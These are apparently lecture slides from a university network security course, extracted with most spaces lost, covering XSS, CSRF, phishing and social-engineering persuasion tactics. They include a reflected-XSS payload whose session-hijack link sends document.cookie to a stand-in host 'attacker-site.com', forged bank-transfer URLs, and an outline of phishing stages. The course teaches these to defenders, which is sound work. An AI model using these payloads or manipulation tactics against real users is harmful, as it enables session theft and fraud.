network security - unitn.it that allow the malicious website to spoof the ... that their freedom of...

NetworkSecurityAA2015/2016

Vulnerabilities(b)Dr.LucaAllodi

Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016)

1

Cross-site-scripting(XSS)

• Amongthemostcommonifnotperhapsthemostcommonweb-basedattack

• Byexploitingthisvulnerability,theattackercanmodifythecontentdeliveredtoauser’sbrowser

• Thevulnerabilityisontheserver,buttheattackaffectstheuser

Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 2

StatsfromNVD(Feb2016)

XSSattacks

• Regardlessofexecution,arebasedontheimplicitnotionoftrustthatexistsbetweenabrowserandaserver

• Thebrowserexecuteswhateverthecontactedwebsitesays• “Same-origin-policy”

• Appliedalsotobrowsercookies,JSexecution,etc.

• Vulnerabilityallowstheattackertoinjectcontentonawebpage

• Whenvictimbrowserloadswebpageitexecutesinjectedcontent

• Thebrowsercannotdistinguishbetweenlegitimateand”malicious”instructionsà allcomingfromatrustedsource


StoredXSS(PersistentXSS)

• ThisXSSvariantisstoredontheremoteserver• E.g.aforumthread,anewsletter,adatabase

• Wheneverauserretrievesacertainwebpage,themaliciouscontentisdeliveredtotheirbrowser


1.Injectionattack

Theserverstoresthecraftedinstructionsfromtheattackeranddeliversthemtousersthataskforthecontentwheretheattackisstored

ReflectedXSS(Non-persistent)

• Theattackersomehowtrickstheuserinsendingtheforgedinputtotheserver

• e.g.sendsalinkwithaspamemail


1.Attackersendscraftedlinktouser

2.Userclickslinkansendsrequesttoserver

3.Serverreplieswithmaliciouscontent

ReflectedXSSexample

Webpagecode:<?php $name=$_GET['name'];echo"Welcome$name<br>";echo"<ahref="http://legit-site.com/">ClicktoDownload</a>";?>Attackersendsthisurl tovictim:index.php?name=guest<script>alert('attacked')</script>SessionHijack:<ahref=#onclick=\"document.location=\'http://attacker-site.com/xss.php?c=\'+escape$document.cookie$\;\">ClicktoDownload</a>


XSS- impacts

• disclosureoftheuser’ssessioncookie,• Canbeusedtohijackuser’ssession

• disclosureofenduserfiles• redirecttheusertosomeotherpageorsite

• E.g.controlledbytheattacker• Possibleotherattackvectorsstoredonthatpage

• modifywebpagecontent/information• e.g.modifybuttonfunctionalities

• ..


Cross-siterequestforgery

• SimilarinprincipletoanXSSattack• Ratherthanexploitingthebrowser’strustonserverreplies,itexploitsserver’strustonbrowserrequests

• Attackhappensontheserverà server“changestate”• e.g.executesserver-sideoperationnotintendedbyuser


StatsfromNVD(Feb2016)

CSRF

• Forgedinputtoserverexecutesactionsontheserverà changesserverstatus

• Usuallyexploitsauser’sstoredcredentialstoexecuteillegitimateactionsonawebsite

• Changeemail/password• Performserveroperations(e.g.banktransfer)

• Example(https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))• ImagineawebbankthatoperatesthroughHTTPGETarguments

• GEThttp://bank.com/transfer.do?acct=BOB&amount=100HTTP/1.1

• Attackercantricktheuserinsendingforgedrequest• http://bank.com/transfer.do?acct=MARIA&amount=100000• e.g.embedlinkinHTMLsourcecode


Commonsourceofvulnerability

• SQLinjectionà SQLbackendtrustsunsanitizedinput

• Bufferoverflowà Systemcannotdistinguishbetweeninstructionsanddata,truststheinputtobecorrect

• XSSà thebrowsertruststhecontentsentbytheserver

• CSRFà theservertrustsandexecutesthecommandssentbythebrowser


Humanvulnerabilities

“Thebiggestthreattothesecurityofacompanyisnotacomputervirus,anunpatchedholeinakeyprogramorabadlyinstalledfirewall.Infact,thebiggestthreatcouldbeyou.WhatIfoundpersonallytobetruewasthatit’seasiertomanipulate peopleratherthantechnology.Mostofthetimeorganizations overlookthathumanelement”

KevinMitnick


Phishing

• Theattackeraimsatobtainingthecredentialsofusersofawebsite/service

• othertypesofprivateinformationcanbegatheredtoo• Typicallythroughmoresophisticated“spearphishing”attacks

• Attackercreatesareplica oftheoriginalwebsite• Replicaispublishedonline• Linktypicallysentthroughspamemails,socialnetworks• Recipientmaybefooledinopeningthelinkandenteringtheircredentialsasinthegenuinewebsite

• Credentialsareofcoursesenttotheattackerinstead


Phishing– attackertools

• Creatingaworkingreplicaofawebsiteisonlyashardascreatingacopy

• Attackerneedstomodifysomeofitscomponents• e.g.sendformHTTPPOSTtoawebservertheattackercontrols

• AdvancedattackersmayremoveJS/thirdpartycomponentstopreventexposingthephishingwebsite

• Advancedattackersvsscriptkiddies

• Automatedtoolsexistthatdothisfortheattacker• Fewhundredsofdollarsonblackmarkets• Essentiallyarecursivewget


Phishinginanutshell


Phishingexample

Translation(including Englishreproductionoflexicalandgrammaticalerrors).

Warning:Wenoticedsomethingunusualinarecentemailaccountsign-in.Tohelpmaintaining secure,werequestedachallengehighersecurity.clickthelink{link}, Wekindly asktoreviewyouractivitiesrecentandwewillhelpyoutakingcorrectingmeasures.

Combiningphishingandsoftwarevulnerabilities

• Inthiscaseit’seasytonoticethatthedomainI’mredirectedtoisnotUniTn’s

• However,thereexistvulnerabilitiesinbrowsersthatallowthemaliciouswebsitetospooftheaddressdisplayedintheaddressbar

• Example:• Thewebpageisgfcv-altervista.org• Thebrowsersaysit’swebmail.disi.unitn.it

Exampleofaddressspoofing

• Safari8vulnerabilityunderOSX<10.10.5• PoC →http://www.deusen.co.uk/items/iwhere.9500182225526788/

• OthersimilarvulnerabilitiesexistforIEandChrome

• Ifbrowserisvulnerable,attackercanmanipulateaddressbar’scontenttohis/herliking

Socialengineering

• Phishingisonlyanapplicationofawidersetofattacksthatexploithumannatureto(usually)breachdataconfidentiality

• “Socialengineering”identifiesasetoftechniquesthatattackweaknessesinhumanpsychology

• Thefinalgoalistopersuadeahumanbeing inperformingactionselicitedbytheattacker

• Situationaltheoryofpublicsà whypeoplewouldtakeaction,orfeelpartofacollective

• Problemrecognitionà subjectthinkstheproblemisrelevanttothem

• Activeinvolvementà subjectthinkstheywillsuffertheconsequencesofthethreat

• Constraintrecognitionàsubjectthinkstheiractionsarelimitedbyfactorsoutsideoftheircontrol


ElaborationLikelihoodModel(ELM)• ELMdescribesthewayshumanschangetheirattitudesordecidetoperformactionstheywouldnotperformwithoutexternalstimuli

• Tworoutesto“persuasion”• Centralroute

• Stimuliareweightedbythesubjectandfinaldecisioniscarefullyelaborated

• Highamountofcognitiveeffort• Associatedwith“rationalperfectlyinformeddecisions”ineconomics

• Persuasionhappensthroughcarfulelaborationofinformation• Peripheralroute

• Communicationthattypicallydoesnotresultincarefulcognitiveeffortinunderstandingthemessage

• Subjectisconvincedbyunder-analyzingapparentlyrelevant“cues”thatareinrealityunrelatedtothesubjectmatter

• Persuasionhappensthrough”adjunctelements”tothecommunication• Likeabilityofsubject,physicalattractiveness,trust,…


Usesoftheperipheralroute

• Vastlyusedasa“cheap”routetoconvincepeopletoperformanaction

• Buyaproduct• Subscribetoaservice• Visitalocation• …

• Especiallyeffectivewhenphysicalcontactisnotafactor• Marketingstrategiesoftenrelyonthismechanisms

• TVadmustconvinceyoutobuyashampooin30seconds• Socialengineeringdiffersfrommarketinginthatattackstypicallydonottrytosellproducts

• Rather,socialengineersmustpersuade victimstodisclosesensitiveorprivateinformation


Hackingahuman

• Sixfactorsaffectlikelihoodofhumanpersuasion1. Reciprocation

• Subjectsformimpliedorexplicitobligationstowardseachotherà Normativecommitment

2. Consistency• Subjectstendtobeconsistentwithpreviousdecisions,evenifallevidence

showsthatthesewerebad decisionsà Continuancecommitment3. Socialproof

• Subjectstendtoactsimilarlytotheirpeersto“fitin”à Affectivecommitment4. Likeability

• Subjectstendtotrustpeopletheylike,findconvincing,orattractive5. Authority

• Subjectsfear punishment(thatanauthoritycanimpose)andwillcomply6. Scarcity

• Subjectswillreact quicklyandpossiblyirrationallytostimuliwhentheybelievethattheirfreedomofchoiceisafunctionoftimeorresourceavailability


Normativecommitment

• Subjectswillperformanactionbecausethat’scustomaryormandatedbylaworcontract

• Basedonthenotionofreciprocationofbenefits• Whensubjectsreceivessomethingtheyvalue,theyfeel“cognitivedissonance”

• Essentiallya“bug”ofhumanpsychology• Facedwhensubjectmustelaboratetwocontrastingforcesorinputs

simultaneously• Subjectmustelaborateevidence incontrasttohispreviousbeliefs• E.g.“Idonotneedsuncream”à “here isatesterforyou”à “thankyouI

shouldprobablybuysome”

• Promisescountas“somethingofvalue”• Ipromiseyouavaluablegoodatthesolecostofshipping

• Peopletendtocomplybecausetheyfeel“gratitude”fortheunsolicitedproposal


Continuancecommitment

• Subjectstendtomaintaincongruenceintheirattitudesanddecisionseveninpresenceofevidencethatthesearebad

• Subjectstendtomaintaincognitiveconsonanceasopposedtofacecognitivedissonance

• Ineconomicsthisisreflectedintheconceptof“lossaversionandsunkcosts”

• Ifaninitialinvestmentwasbad,peoplewilltendtokeeponinvestingbecausetheyareconvinceditwilleventuallypay-off

• Pay(small)escalatingcoststowinateddy-bear

• Upfrontcostsareloww.r.t promisedbenefitvscostoftakingprecautions(oropportunitycosts)

• Peoplearewillingtogiveawaypersonalinformationfornegligiblebenefitsordiscounts(eveniftheyclaimtheyarewillingtopayapremiumtopreservetheirprivacy)[Acquisti 2003]


Affectivecommitment

• Peopleareinfluencedbytheopinionofthosetheyesteemorlike

• Decisionofactiontakentobepartofacliqueoracircleofpeers

• Widelyusedformarketingtoo• Emotionalbondwithinterlocutorcanbeexploitedtohavethevictimcommunicatepersonaldetailsorperformcertainactions

• e.g.pretendyouareonavacationwithafriendofthevictimandaskmoneytosolveanemergency

• Socialnetworksmaketheseinferencespossiblefortheattacker


LikingandTrust

• Similarlytoaffectivecommitment,peoplearewillingtobelikedbythosewhomthelike

• Takeactiontoobtainconsentfromthosetheylike• Peopletendtoextend“credibility”ofsubjectstheyperceiveassuccessfulbeyondthereasonableboundariesofthesesubjects’actualexpertise

• e.g.famousactorthatpublicizesbiscuitsdespitehavingnoactualexpertiseorcredibilityasabaker,butonlyasanactor

• Whenphysical/presenceattractionisnotafactor(e.g.emailexchange),thelikeabilitycanemergefroma“friendlyconnection”

• e.g.appealorelicitcommontraits


Authority

• Peopletendtorespondtoauthorityespeciallywheninfearoftheoutcomesofnottakingaction

• E.g.Punishmentorthecancellationofaprivilege• “Youremailaccountisgoingtobedeletedifyourpasswordisnotconfirmed.”

• Obediencetoauthorityisaverypowerfultooltopersuadepeopleinpertainingactionsorbehaviors

• Insome(occasionallyverycontroversial)casespeoplewillobeytoauthorityevenagainstwell-establishedmoralvaluesandethics


Effectsofauthority– Milgram’sexperiment• Experimentinthe1960s@Yale,replicatedseveraltimes• SubjectAdeceivedinparticipatinginanexperimentwheretheyhadto“teach”subjectBcombinationsofEnglishterms

• SubjectBisinrealityacollaboratoroftheexperimenter• WheneversubjectBgivesthewronganswer,subjectAmustinflictanelectrical

shocktoB• Voltageincreaseswithnumberoferrors• NovisualcontactbetweenAandB,butAcanhearBscreaminginpainfortheshock• Thereisnoactualshock, butAdoesnotknow

• TowhatextentwillAcollaborate?• 65%ofsubjectAswentallthewaytohighestshocklevel(whenBeffectively

stoppedanswering)• SubjectAsfeltdeeplyconcernedandstressed,expressedprofoundanxiety,

hadhystericalreactions• Yet,theexperimenter’s(authority)powerwasenoughtopushthemin

continuingwiththeexperimentinmostcases1. “Pleasecontinue.”2. “Theexperimentrequiresthatyoucontinue.”3. “Itisabsolutelyessentialthatyoucontinue.”4. “Youhavenootherchoice,youmustgoon.”


Scarcity

• Similarlytofear,scarcityleadspeopletotakequick,potentiallyuninformeddecisionsinfearoflosinganopportunitythatwilleitherdisappearintimeorthatisscarceinquantity

• Canbeusedbysocialengineerstoelicitunwisedecisionsfromthevictims

• Threatenthatifnodecisionistakenquickly,theopportunitymayfadeaway

• Attackersposesa“constraint”inthefreedomofchoiceofthevictim


Socialengineeringsteps

• Candistinguishbetweensingleandmultiple-stagesocialengineeringattacks

• Singlestageattacksusuallyaimatcollectingsensitiveinformationabout“general”targets

• Nospecificityintheattack• e.g.attackallcostumersofmybank.com


Two(multiple)stageattacks

• Two-stageattacksinvolveaninitialreconnaissancethatgathersinformationneededforsecondstage

• Usedtoincreasecredibilityofattack• E.g.properlegalreferences,employeenames,correctsetofusersinCCto

phishingemail,etc• Spearphishing againstCEO/director/manager/personofinterest


Stepsindetail(firststage)Pattern Phase Typical Activities Pattern Interactions

1. Research and Open Source Intelligence

• Search for opensource intelligence • Establish attack objectives • Identify opportune targets

1.1 Attacker researches and strategizes about potential targets and specific objectives.

2. Planning and Preparation

• Develop attack strategy including means to avoid detection and mitigation by UIT organization• Prepare phishing attack artifacts

2.1 Attacker plans phishing attack and creates phishing artifacts (e.g., phishing email, mobile text message, phony website, malware to be implanted).

3. Phishing Operation • Release phishing artifact via email, cellphone, rogue website, or other means • Wait for a response

3.1 Attacker initiates phishing attack through email, cellphone, rogue website, or other means.

4. Response and Information Capture

•Gain access and/or privileges to obtain greater information reach •Implant malware to achieve information objectives •Identify other opportune UIT targets and internal system information, and capture guarded and sensitive information

4.1 One or more targets unwittingly respond to phishing artifact and become a UIT. 4.2 Attacker detects or is alerted to UIT response and obtains initial information directly from UIT data entry. 4.3 Attacker implants malware on victim’s machine or network. 4.4 Attacker obtains desired information via malware.


Unintentional InsiderThreats:SocialEngineering.CERTInsiderThreatCenter.January 2014http://resources.sei.cmu.edu/library/asset-view.cfm?assetID=77455

Stepsindetail(secondstage)Pattern Phase Typical Activities Pattern Interactions

5. Re-planning and Preparation

•Re-plan attack strategy including means to avoid detection and mitigation by UIT organization •Prepare spear phishing attack artifacts

5.1 Attacker uses information capture in Step 4 above to replan follow-on steps for spear phishing attack. This may entail creation of new artifacts or specific attack approaches.

6. Spear Phishing Operation

• Execute spear-phishing • Wait for a response 6.1 Attacker initiates spear phishing attack.

7. Response and Information Capture

•Gain access and/or privileges to obtain greater information reach •Exploit more specific insider targets: financial system, secure systems, etc.

7.1 One or more high-value targets unwittingly responds to the spear phishing artifact and becomes a UIT. 7.2 Phisher detects or is alerted to UIT response and obtains desired information directly from UIT data entry.

8. Attack Culmination and Exploitation

• Use captured information to directly attack UIT or UIT’s organization to steal, manipulate, and/or destroy targeted assets

8.1 Attacker uses desired information in direct attack on UIT or UIT’s organization to steal, manipulate, and/or destroy targeted assets.


Unintentional InsiderThreats:SocialEngineering.CERTInsiderThreatCenter.January 2014http://resources.sei.cmu.edu/library/asset-view.cfm?assetID=77455

Example:wellengineered,2-stagesocialengineeringattack• On19th ofMay2015Ireceivedanemailfromsomebodyattachinga“receipt”.TheemailwasingoodItalian,andhadseeminglymeaningfullawreferencesregulatingtheemissionofthereceipt

• However,Iwasnotexpectingareceipt• Idiscardeditrightawayasanattackà trashed

• Thenextday,Ireceivethis email:


Dearcostumer,Wekindlyask youtoignorethepreviousreceiptandsubstituteitwiththepresent,dated24/03/2015 ThereceiptmustbeprintedandarchivedbythereceivingsubjectasprescribedbyDRP607/40andsubsequentchanges, andbyRMno.450217,emittedon30/07/1990

Bestregards,Jarvis Bernard

continuancecommitment(variationof)

authority

normativecommitment

Almostfellforit..

Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 34Reportedresultsareforattachmentoffirstemail.Secondattachmentgavesameresults.

ReadingList• Arora,Ashish,etal."Impactofvulnerabilitydisclosureandpatchavailability-anempiricalanalysis."ThirdWorkshopontheEconomicsofInformationSecurity.Vol.24.2004.

• Miller,Charlie."Thelegitimatevulnerabilitymarket:Insidethesecretiveworldof0-dayexploitsales."InSixthWorkshopontheEconomicsofInformationSecurity.2007.

• http://phrack.org/issues/49/14.html• OWASPresources• Moore,Tyler,andRichardClayton."AnEmpiricalAnalysisoftheCurrentStateofPhishing AttackandDefence."WEIS.2007.

• Workman,Michael."Wisecrackers:Atheory-grounded investigationofphishingandpretextsocialengineering threatstoinformation security."JournaloftheAmericanSocietyforInformationScienceandTechnology 59.4(2008):662-674.

• Acquisti,Alessandro,andJensGrossklags."Losses,gains,andhyperbolicdiscounting: Anexperimentalapproachtoinformationsecurityattitudesandbehavior."2ndAnnualWorkshoponEconomicsandInformationSecurity-WEIS.Vol.3.2003.


network security - unitn.it that allow the malicious website to spoof the ... that their freedom of...

Documents